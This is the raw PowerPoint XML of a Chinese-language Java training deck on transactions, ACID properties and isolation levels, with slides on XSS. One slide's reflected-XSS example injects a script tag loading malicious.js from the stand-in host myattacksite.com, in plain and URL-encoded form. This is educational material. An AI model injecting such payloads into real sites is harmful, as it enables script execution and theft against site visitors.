            <a:ext cx="293671" cy="596934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>
            <a:off x="1046614" y="3338382"/>
            <a:ext cx="306197" cy="543746"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 58724"/>
              <a:gd name="adj3" fmla="val 682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>
            <a:off x="789140" y="3839247"/>
            <a:ext cx="563671" cy="2178818"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22693"/>
              <a:gd name="adj2" fmla="val 56341"/>
              <a:gd name="adj3" fmla="val 327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下彎) 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4847573" y="200416"/>
            <a:ext cx="209184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下彎) 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6943594" y="200416"/>
            <a:ext cx="2200406" cy="346069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10800000">
            <a:off x="6939419" y="1423861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下彎) 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4719734" y="1436942"/>
            <a:ext cx="2200406" cy="346069"/>
          </a:xfrm>
          <a:prstGeom prst="curvedDownArrow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「exception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97" y="432984"/>
            <a:ext cx="1091298" cy="10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12000" dirty="0" smtClean="0"/>
              <a:t>Transaction</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="12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交易管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="流程圖: 結束點 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875777" y="1651521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begin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838200" y="272314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交易活</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>動</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="流程圖: 決策 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537575" y="3632871"/>
            <a:ext cx="2317315" cy="9269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交易正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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838200" y="4900086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commit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469437" y="3808235"/>
            <a:ext cx="1716066" cy="576197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rollback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流程圖: 結束點 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="875777" y="5913256"/>
            <a:ext cx="1640910" cy="588724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end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1696232" y="2240245"/>
            <a:ext cx="1" cy="482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  <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696233" y="3299343"/>
            <a:ext cx="0" cy="33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2"/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1696233" y="4559797"/>
            <a:ext cx="0" cy="34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0" idx="2"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1696232" y="5476283"/>
            <a:ext cx="1" cy="43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3"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2854890" y="4096334"/>
            <a:ext cx="614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1" idx="2"/>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2510486" y="4390634"/>
            <a:ext cx="1823186" cy="18107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980" y="1964977"/>
            <a:ext cx="1104900" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="直線單箭頭接點 45"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="2"/>
            <a:endCxn id="48" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6330216" y="3098690"/>
            <a:ext cx="626301" cy="458696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圖: 程序 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703914" y="3557386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54" name="流程圖: 程序 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114029" y="3557385"/>
            <a:ext cx="1252603" cy="563673"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0083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5" name="直線單箭頭接點 54"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="2"/>
            <a:endCxn id="54" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6956517" y="3098690"/>
            <a:ext cx="783814" cy="458695"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0083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2"/>
            <a:endCxn id="63" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9532703" y="3041302"/>
            <a:ext cx="680727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程序 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906401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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="流程圖: 程序 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10309859" y="3557385"/>
            <a:ext cx="1252603" cy="563673"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess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65" name="直線單箭頭接點 64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="43" idx="2"/>
            <a:endCxn id="64" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10213430" y="3041302"/>
            <a:ext cx="722731" cy="516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向右箭號 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7799753" y="2357083"/>
            <a:ext cx="1594768" cy="588098"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 41481"/>
              <a:gd name="adj2" fmla="val 6278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29" y="2041415"/>
            <a:ext cx="1171575" cy="1057275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1040" name="Picture 16" descr="「lightning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44" y="16175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文字方塊 83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062353" y="4243521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42304" y="4243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9264840" y="4269583"/>
            <a:ext cx="5357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0668298" y="4264378"/>
            <a:ext cx="5357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9" y="1728232"/>
            <a:ext cx="4276725" cy="1952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2135" y="1677353"/>
            <a:ext cx="229376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交易起始，寫在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>外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5543" y="2074070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資料異動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00483" y="251313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5419" y="2953901"/>
            <a:ext cx="405931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交易失敗，回到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transaction.begin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狀態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35" y="986512"/>
            <a:ext cx="4286250" cy="172402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 flipV="1">
            <a:off x="6063539" y="1848525"/>
            <a:ext cx="520196" cy="4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80006" y="3752294"/>
            <a:ext cx="10515600" cy="313054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Transaction.getDataSet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zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>如何取得連線</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>名稱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((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>JDBCTransaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>userTx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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DynamicDBModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>().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TransactionHelper.getInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>getConnName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getConnName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ("DS_", null, Platform.NA);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9" y="3899774"/>
            <a:ext cx="6681603" cy="33480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55" y="4276627"/>
            <a:ext cx="7744248" cy="3056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91" y="4999935"/>
            <a:ext cx="10015140" cy="39303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54" y="4575959"/>
            <a:ext cx="10306277" cy="3930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79" y="5399777"/>
            <a:ext cx="6536039" cy="3639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71532" y="4199877"/>
            <a:ext cx="337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com.cathaybk.xx.dao.XX_CARS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596006" y="4566786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xx.dao.XX_CARS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02576" y="495508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610094" y="5390569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DS_XX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8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eBAF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>JSTL &amp; EL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Transaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p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-reset</a:t>
            </a:r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交易四大原則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原子性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Atomicity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所有異動都要完成，否則回復至異動前的狀態</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一致性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Consistency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交易開始前和結束後，資料庫的完整性沒有被破壞*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>隔離</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Isolation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資料庫允許多個交易同時對資料進行更動，並防止多個交易同時執行時由於交叉執行而導致資料不一致</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>持續性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Durability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提交後的資料狀態須保存下來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9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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="59BF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5" name="流程圖: 程序 4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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="DB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6" name="流程圖: 程序 5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  <a:ln>
            <a:solidFill>
              <a:srgbClr val="5AD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8" name="流程圖: 磁碟 7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4" idx="2"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117850" y="3625139"/>
            <a:ext cx="2882900" cy="1707274"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="59BF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2"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6000750" y="3625139"/>
            <a:ext cx="12700" cy="1707274"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="DC7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8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6000750" y="3625139"/>
            <a:ext cx="2908300" cy="1707274"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="5AD6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84" y="2379553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-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924050" y="2511699"/>
            <a:ext cx="2387600" cy="1113440"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="59BF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" name="流程圖: 程序 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819650" y="2511699"/>
            <a:ext cx="2387600" cy="1113440"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DC71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8" name="流程圖: 程序 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7715250" y="2511699"/>
            <a:ext cx="2387600" cy="1113440"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5AD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90650" y="1885950"/>
            <a:ext cx="9220200" cy="2190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3933825" y="5332413"/>
            <a:ext cx="4133850" cy="1009650"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="54A5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Database</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="直線單箭頭接點 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="2"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6000750" y="4076700"/>
            <a:ext cx="0" cy="125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40375" y="1942194"/>
            <a:ext cx="95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pic>
        <p:nvPicPr>
          <p:cNvPr id="11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84" y="2423277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隔離等級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Uncommitted:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指某個交易可以讀取另一個交易已更新但尚未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 Committed:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>只允許讀取已認可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（已經成為資料庫永久部分的資料）。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 Repeatable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Read:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鎖定查詢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中的資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，以防止其他交易更改資料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dirty="0" smtClean="0"/>
              <a:t>Serializable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>某一交易所使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所有資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表，全部都會被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>鎖定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>交易循序進行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78084"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4157598" y="298450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Phantom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Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Uncommitted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>某</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個交易可以讀取另一個交易已更新但尚未</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>commit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Dirty read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15641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6288848" y="308472"/>
            <a:ext cx="1318452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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4157598" y="647700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Dirty read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5802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(100-&gt;120)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Rollback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687" y="34607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Unrepeatable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/>
              <a:t>Read Committed:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>只允許讀取已認可的資料（已經成為資料庫永久部分的資料）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Unrepeatable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6747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7952547" y="308472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8" y="1008857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649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Update(A) (100-&gt;200)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Phantom </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br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Repeatable Read:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鎖定查詢中的資料，以防止其他交易更改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Phantom read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09035"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4144898" y="299444"/>
          <a:ext cx="7615300" cy="173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3825">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2117702079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552786426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3000588977"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1903825">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="151999538"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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Isolation 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Dirty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Unrepeatable Read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Phantom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047836359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Uncommitted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731973311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Read Committed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4101788634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Repeatable Read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+mn-ea"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1700" b="0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+mn-ea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163530718"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="347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Serializable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924" marR="8924" marT="8924" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3642464430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9892884" y="333147"/>
            <a:ext cx="1867313" cy="305890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4144897" y="1395006"/>
            <a:ext cx="7615300" cy="287336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68441"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1581627" y="3789851"/>
          <a:ext cx="8476773" cy="20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591">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2912059094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1263129513"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2825591">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4203038276"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4063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Transaction1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Transaction2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147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Read(A) (100)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75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Insert(A) (200)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2424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13317"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="41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Read(A) (100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74529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29608"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10128729" y="4777875"/>
          <a:ext cx="18727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271439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3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31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17590"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10128729" y="3749628"/>
          <a:ext cx="187277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771">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="406206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82694"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="流程圖: 程序 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10128729" y="3749628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10119443" y="4770073"/>
            <a:ext cx="1872771" cy="7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smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XSS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6228" y="3900100"/>
            <a:ext cx="119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Cross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46764" y="391291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Site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78879" y="3900101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Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="36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hackertarget.com/xss-simple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365125"/>
            <a:ext cx="8603415" cy="61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79573" y="6116696"/>
            <a:ext cx="175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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>hackertarget.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1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XSS-Types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787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Reflection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>://localhost:8080/Demos/?username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“&gt;&lt;script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=”http://myattacksite.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/malicious.js”&gt;&lt;/script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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DOM Based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Http request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>//www.test.com/hello.html?name=test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Stored/Persistent XSS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613845" y="2217999"/>
            <a:ext cx="8229600" cy="879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http://localhost:8080/Demos/?username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%3D%E2%80%9C%3E%3Cscript%20src%3D%E2%80%9Dhttp%3A%2F%2Fmyattacksite.com%2Fjs%2Fmalicious.js%E2%80%9D%3E%3C%2Fscript%3E%0A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784" y="56539"/>
            <a:ext cx="1176907" cy="1053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09" y="1099097"/>
            <a:ext cx="1148942" cy="11684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024" y="1066205"/>
            <a:ext cx="1062065" cy="1018892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="「mail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78" y="392613"/>
            <a:ext cx="528186" cy="5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單箭頭接點 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7488980" y="238715"/>
            <a:ext cx="1711660" cy="860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線單箭頭接點 2051"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7893700" y="820071"/>
            <a:ext cx="1410291" cy="69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線單箭頭接點 2056"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10029240" y="343464"/>
            <a:ext cx="1880370" cy="76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單箭頭接點 2060"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
